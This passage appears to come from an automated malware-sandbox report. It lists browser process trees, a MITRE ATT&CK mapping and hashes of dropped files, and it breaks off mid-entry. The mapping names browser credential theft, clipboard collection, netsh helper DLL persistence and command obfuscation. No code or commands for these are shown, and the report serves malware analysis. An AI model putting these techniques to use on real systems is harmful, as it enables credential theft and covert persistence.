  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa6f1bcc40,0x7ffa6f1bcc4c,0x7ffa6f1bcc58
  2⤵
  PID:3144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2052,i,12976550819371156728,15127238847148996897,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=2044 /prefetch:2
  2⤵
  PID:2056
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1784,i,12976550819371156728,15127238847148996897,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=2260 /prefetch:3
  2⤵
  PID:5836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2092,i,12976550819371156728,15127238847148996897,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=2344 /prefetch:8
  2⤵
  PID:5508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3144,i,12976550819371156728,15127238847148996897,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=3164 /prefetch:1
  2⤵
  PID:5384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,12976550819371156728,15127238847148996897,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=3204 /prefetch:1
  2⤵
  PID:5744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3724,i,12976550819371156728,15127238847148996897,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=4560 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4892,i,12976550819371156728,15127238847148996897,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=4900 /prefetch:8
  2⤵
  PID:7148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,12976550819371156728,15127238847148996897,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=4900 /prefetch:8
  2⤵
  PID:4496
- C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  - Drops file in Program Files directory
  PID:7136
- - C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0x7ff74b224698,0x7ff74b2246a4,0x7ff74b2246b0
    3⤵
    - Drops file in Program Files directory
    PID:6208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5000,i,12976550819371156728,15127238847148996897,262144 --variations-seed-version=20241121-182614.093000 --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:4752

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6764
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa86ff46f8,0x7ffa86ff4708,0x7ffa86ff4718
  2⤵
  PID:5068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
  2⤵
  PID:6380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3
  2⤵
  PID:6544
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
  2⤵
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
  2⤵
  PID:1660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4348 /prefetch:1
  2⤵
  PID:5056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4236 /prefetch:1
  2⤵
  PID:2840
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3488 /prefetch:8
  2⤵
  PID:5360
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3488 /prefetch:8
  2⤵
  PID:620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5448 /prefetch:1
  2⤵
  PID:6772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
  2⤵
  PID:1776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
  2⤵
  PID:5956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,11925470069925474851,6311463238082861866,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1
  2⤵
  PID:6632

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1920

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:8

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
db9149f34c6cfa44d2668a52f26b5b7f

SHA1
f8cd86ce3eed8a75ff72c1e96e815a9031856ae7

SHA256
632789cdfa972eec9efe17d8e2981c0298cf6bd5a7e5dad3cbdcf7bb30f2e47f

SHA512
169b56304747417e0afe6263dd16415d3a64fff1b5318cd4a919005abe49ca213537e85a2f2d2291ea9dc9a48ea31c001e8e09e24f25304ae3c2cfefad715ce9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\1a90da33-17c8-4944-8ecb-40f15a1bbbad.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
94842d278aecbe6f53bd7c20ac56f2ee

SHA1
3805ea477c07869465c00a23a7b4cecabc086122

SHA256
279e785e2aaa00c57475ea36c3a061c40f0cf9121d102d689b1df836eb76d755

SHA512
9c4451c6c0b0ac87249c2ad4942719fd0602e507797248d9f6110f055bfe337c50bc60f5b791402b134b6daaed7136f58b9dc20321209938a3211ae6d1c9bff1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
2be38925751dc3580e84c3af3a87f98d

SHA1
8a390d24e6588bef5da1d3db713784c11ca58921

SHA256
1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b

SHA512
1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
192B

MD5
f439514589a7fca84ed40f75858e8712

SHA1
23b57c98486de8abbb18a802155ec8ae9ec23e56

SHA256
9405e806adff563fc4b95a4fba4965666dc98fb4d3f66d32f62f146ca7fe0c38

SHA512
3c16ca823cbe0d00df62ebc9881c91a92c79fce8136affd67df273e4b7a732c70229a9b5cc0f49d052fee742a907c8d27593cb08829522ddb8f79a6d2f0ae912

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
76ceda995d25d27299972aa699f06ce0

SHA1
71605d07fdab83fc28a0f7030fa022c09fd20cf8

SHA256
6bb7f710beda6bda21c7e7aa84945decde6dcb5eef49656b9eaec6146d37ece9

SHA512
93a9c49676333b70b0cf64e1a278dfdb4ead50b285841224f21e35636746270b8d63d9aa0350b07a7fe81bfa4e79b13186359c05c2a51073b9a9060bee36a4a7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
7a343714f2fc228bf71ee52e6e7b8ad1

SHA1
c230bbf51a7de50f7736a2910ae6e2710d9b85b7

SHA256
efdbd7c00680819b91b50510b27b174c46ca4b37280e6234e5bb034c74440da3

SHA512
36ee3ff8dfec4e0e56c6d86a5d68a3ed7373382ad2085deaf30b1a8fec2e0dab92a29b8364f46c60eb40f483b78672b7e1ca99251ac0e1bf76dd15ec9660355e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
2KB

MD5
289bf44c98bc81c3f28ec13f2ce80926

SHA1
1fa96dd6721b3a4d703f3ea6e6efd48ed702ce2a

SHA256
bddc80beeb63c4fc3b9fcfaa491e8b5e9c37bd3143b38eefd1e1cb3a7b781de8

SHA512
40cba907edb095c4337df1d406e7c181c93b216da9eb21b9a413b456c7a9864b0c0347de78e206b5bf99a2f709a59423a91a93de486c259c48ffe5d4c4101f75

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
c87669ffc523d1cd6f9018f0b0c3f3de

SHA1
85514c0fb4608aac1a7a3e3714724187f5afae5e

SHA256
cf9ab8d650acfe033f6b7e1b81d8136d2ea25c1acb43ca8d17f1288cac741d00

SHA512
92d7f98b8ca41c97d675fd0c8dd41754f429b11742d60c8ccccb1c74893bd61e772d8d0a81328ebde12929aa3a5ea04f9a6e9855884178ae70bd385dca613391

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
a33a315fcc7712a270d2e7ebd505256f

SHA1
347ccc134eefcaa03ebd9265a10e69a8002ec4d8

SHA256
19e64ae0a9094253179a25819e43d5bc2ff6c3fc9208be202874a42bb04661cf

SHA512
4f4990122ae3844ebf57a8d1cfa306bdf67fade58cf0c95ac0bcc554597e1c78c50408e2de7774f7fa57e0b61f15fefe9d764d311afac6ec033fc1add4e52f11

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
31ac9becb7c799535578452de604499a

SHA1
3c99198dfd64358b5081917163cdc8a56b86db2f

SHA256
d7f8bcb5486ace0f336c620c3c8362eb12fac35524211b233b53d9d72df02ff3

SHA512
0cfbe188dc6262132329e001ebad93db1154676e13839235315352539f494629df397795fd06b154055c796058ef77acc2224ecf808525702b08a5755778bdb3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
9a2a647db34fe2df08f500f348c0bb93

SHA1
869084c598547caf0f05f003059b3bf4e7ad4ce6

SHA256
b5d14702dfc6aa1f6535b7e454d2f3c2205b9e247efda9a34f704a5120796b0d

SHA512
a7c9bb6d14247e95809f46bbec39bf3ab290336f7b0c9127316364d427cec9ba79f6aea8635570cdf5394ff1bd60d12b61997b5ab2b6e150c8f463b98693f11f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
68f39f6ef0000ff89b34b300872b93cc

SHA1
e4fb71ecca5f7d080dbb692c52ca85e9ca8e8530

SHA256
714e91e8a3ad4f5ac96d664fb01e351f2de5f603d1924e57a9b36552edfdc7eb

SHA512
a38b9c1ea54574afa63447cebc553849908296e0223585e5f6e43e1513836da61fb78edc91010d360bb9a45fc03c42c0c8b5eedb7ac2a9bb3e91d50e664dfcd5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e11df0a5ad233bc7cf4633f637ffa1e0

SHA1
6eac443cf8e8c15c54dc15855ec6892c281bc2e2

SHA256
8bb35650bf408f6fe1c8364a4cd7dc50935fd1caa5b3642f0704dcdebd803b41

SHA512
6d355f867608a02424ea3856a69e7b72d33a56cf0022b4d1885f9867a0042b09ebf0d69c6885a03afdde0a0454f377aede4bd75aa1829357e8c1f3afdfe68cae

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
63a98498437bd079549684ffad2e6b55

SHA1
9f66fbbef2aac70d151a46d3536a45d56f3e87e2

SHA256
2826528a31c9f434c39f2c5b99446fc8df243bc9fde7c0ac3234b2e641635e92

SHA512
37aeb1023167d39d60d1e02e171cf689e6077e67a4848e20cd61595eedafffb0022647b6d9697efbb2c81c1f31623ecf1cd943a6d853529b04d46a088ad53176

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
620a9341d41a1ff49291a5651b4387bf

SHA1
fe648036ccaf38fafa7d6dd821237000bd46ae5c

SHA256
1135bdea4a349bec642079ca4e3cf6f545e38fc07f0bd5f9e0aafa2867f403ca

SHA512
7c4ebe083ad75cede0b75c9959f8655bfb7d7009a89b97900d297ad54165a820e49a7453be2559f8811e8cbd4c1b9a5500813e4a72d6a9661cf039ebbce8f96e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
b851ac616e7915185d46cfa9b6ceec77

SHA1
2c287e5be3c1a40c87e0054e4259b855db2d9b34

SHA256
e79761b600586472d1b22ba905079225a9180d9e89851ecbf19d6347148bf004

SHA512
56bd73e48054518c64c8777a52c1775b30e024b1f1bd25700913d8b4bbd7727ceebd20307e2d80465e177547838ace927802df377d047fd929684421897548f2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
7f75da68a79851f0304af3e7f38331cf

SHA1
ce75a9d2c133f81d82b95961fbecadfad544d3e6

SHA256
56b6b1729a77dd73fdc6d9ea66889d035500a9dfc2bae6914fd00129d7d6deb8

SHA512
a100961d53b504189c418ba493fa5aa0b0b6a5d2a5eb7ea76520c78880bda7ab9d7e029af8d3b9ec707fad8d1c15a6848a3c7262e126ca4de4d73c8fc5948679

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0fd28da837a9391ff472275c7abb4535

SHA1
277db0625f105392f1c0cc9534efc8eebf19fb20

SHA256
35160721bd025c0b0ce5f1650574f618b9ae2aff00eae64435c02bc3c0d00f7b

SHA512
0ccfd1aad06ae7b61532d91f9211456b7a0bb07863644eed672a254bb4b0cc4e0b0a02a2a26103ea2fe0669bee82c18a9712d1bad63c9fc008e5c03b586635f4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
300df51838055a77d04822425ae76911

SHA1
0a71fb5f0c4b1299f6b00793535cc9e85bb49cbc

SHA256
3def78a097639acfb593ac85ee135e30f0a8c4e7d207fd7d5351aa65f2dc7cab

SHA512
cd9b6991e7f78c99e6bd73b24182f0df63c1ddd4c173addfa5f3cd4f30a4232e0faa0e0fdf67300c1522d346a936425b0565db02cddb800fd01a5c9dcecb99a3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
3aab003b281392ac172d4bb449295849

SHA1
f7449cac9e5128769a421458439ee5d6a7fa5087

SHA256
a71240b31b790e6466d629860f760f05e271046cafa3e789e2c11e82f6f63bf1

SHA512
4452f3b2e661d1b11a468f033c02ceab6da092fa8b565369a31613686cf384e0b08d452a77f41e591689b6310f2f8ac7fb6af85637b3dc690dd7c1cb7ed677e6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
5db90800fe2b70f1a19e657e44ae41b9

SHA1
68b72ae4ab2efa3ca8cb06a258ee57932e4f78be

SHA256
1fc2966959c2eecb87f56d3de81734ce7dd4d9f0b4e9d0c49efc15c39cc8f0fb

SHA512
d33bac6fbed735d87687c49cd9cb8c990a2fa655b5a67a5b889907e1ffbc13bbd2fdc24f73f84e29e916dca2c8d3c30004e224d15ab7ea28a11ff82b3bff44c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
122KB

MD5
5007a481f23c97e69eb68748d4972f45

SHA1
bf02d5eff7d1ed4c30d56f232f20f719f1c8b10e

SHA256
21e150109a4c7d17c63383f45649d2d80ca3644b6a5e484332e9788fba0c2425

SHA512
0b3d6619c711777e204955b30dc4c6df83dc7b87d8d8a4a9e60479eaf50d035b363c4465653b53bdb93b88699a0f0e831c080532de0f28a1d27fde312e674908

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
122KB

MD5
819fc8c439b10a1274c52c6e103ee697

SHA1
e827328992214ac65eb78c49b7f9847134211360

SHA256
21e8c2e24a9da22c91af48f0a6533f00922d6cad6c5fbef61221c58267a4162d

SHA512
9164cbc4bf15052682172ac66843512f8fca499036310cf0b0475df3d1e5fc15f8b70a306c15d63e20bcbe46280b2048b4a46dba2235b5f966aaa22c457326dc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
234KB

MD5
eb77a47458717bcc790a49f3e10e2402

SHA1
f1d61ad5381d2838e41fcd26a26040ac3b356192

SHA256
98bfac070fb32bb2309d0b9cb287dec943a5ea8c973034a7dae779e3d7f3d3ef

SHA512
d9d7c8e6bb184bd0907cb8f248a1d23e0162227bc71e170f50a60c44435327b6620100af619598c8eef73089f2f88ade5ffcb8d7053d9d6e5bd5bd78cc25fc4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8740e7db6a0d290c198447b1f16d5281

SHA1
ab54460bb918f4af8a651317c8b53a8f6bfb70cd

SHA256
f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

SHA512
d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a0486d6f8406d852dd805b66ff467692

SHA1
77ba1f63142e86b21c951b808f4bc5d8ed89b571

SHA256
c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

SHA512
065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dc058ebc0f8181946a312f0be99ed79c

SHA1
0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

SHA256
378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

SHA512
36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7caba0f9d4df4bf9b55a90276289b971

SHA1
